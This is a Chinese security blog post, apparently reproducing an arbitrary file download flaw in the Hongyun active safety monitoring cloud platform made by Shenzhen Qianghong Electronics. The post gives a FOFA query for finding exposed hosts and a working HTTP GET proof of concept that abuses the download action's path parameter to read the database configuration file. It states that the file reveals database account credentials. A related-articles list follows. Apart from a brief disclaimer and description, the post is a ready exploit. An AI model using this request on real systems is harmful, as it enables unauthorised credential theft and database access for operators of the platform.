鸿运主动安全监控云平台任意文件下载漏洞复现 [附POC]

文章目录

  • [鸿运主动安全监控云平台任意文件下载漏洞复现 [附POC]](#鸿运主动安全监控云平台任意文件下载漏洞复现 [附POC])
    • [0x01 前言](#0x01 前言)
    • [0x02 漏洞描述](#0x02 漏洞描述)
    • [0x03 影响版本](#0x03 影响版本)
    • [0x04 漏洞环境](#0x04 漏洞环境)
    • [0x05 漏洞复现](#0x05 漏洞复现)

鸿运主动安全监控云平台任意文件下载漏洞复现 [附POC]

0x01 前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

0x02 漏洞描述

监控云平台实现对计算资源、存储资源、网络资源、云应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。

深圳市强鸿电子有限公司鸿运主动安全监控云平台存在任意文件下载漏洞,攻击者可通过此漏洞获得登录账号密码,以进行后续测试。

0x03 影响版本

复制代码
鸿运主动安全监控云平台

0x04 漏洞环境

FOFA语法:body="./open/webApi.html"

0x05 漏洞复现

1.访问漏洞环境

2.构造POC

POC (GET)

bash 复制代码
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host: ip:port
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: language=zh; style=1; maintitle=%u5317%u6597%u89C6%u9891%u8FD0%u8425%u5E73%u53F0; JSESSIONID=1B2F4E6550CE07CBA9EBE5533B00AE05
Connection: close

3.复现

可以发现数据的账户以及密码,可以进行登录连接数据库。

相关推荐
[seven]15 分钟前
React Router TypeScript 路由详解:类型安全的路由配置与参数处理
安全·react.js·typescript
Neolnfra17 分钟前
文件包含漏洞终极指南
开发语言·安全·web安全·网络安全·系统安全·php·可信计算技术
ZFJ_张福杰1 小时前
【技术深度】钱包安全威胁模型 + 防御蓝图
安全·区块链·钱包
程序员哈基耄1 小时前
隐私与安全工具集:纯客户端安全解决方案
安全
全栈工程师修炼指南1 小时前
Nginx | HTTP 反向代理:对上游服务端返回响应处理实践
运维·网络·nginx·安全·http
wanhengidc1 小时前
电脑端 云手机都有哪些注意事项
运维·服务器·安全·智能手机·云计算
培培说证2 小时前
2026大专前端开发工程师入门证书推荐?
网络·web安全
小毅&Nora2 小时前
【后端】【工具】Redis Lua脚本漏洞深度解析:从CVE-2022-0543到Redis 7.x的全面防御指南
redis·安全·lua
无名修道院2 小时前
XSS 跨站脚本攻击:3 种类型(存储型 / 反射型 / DOM 型)原理以 DVWA 靶场举例
前端·网络安全·渗透测试·代码审计·xss
跨境摸鱼2 小时前
TikTok多账号风控:找对安全支点,解锁规模化运营
大数据·安全·矩阵·重构·跨境电商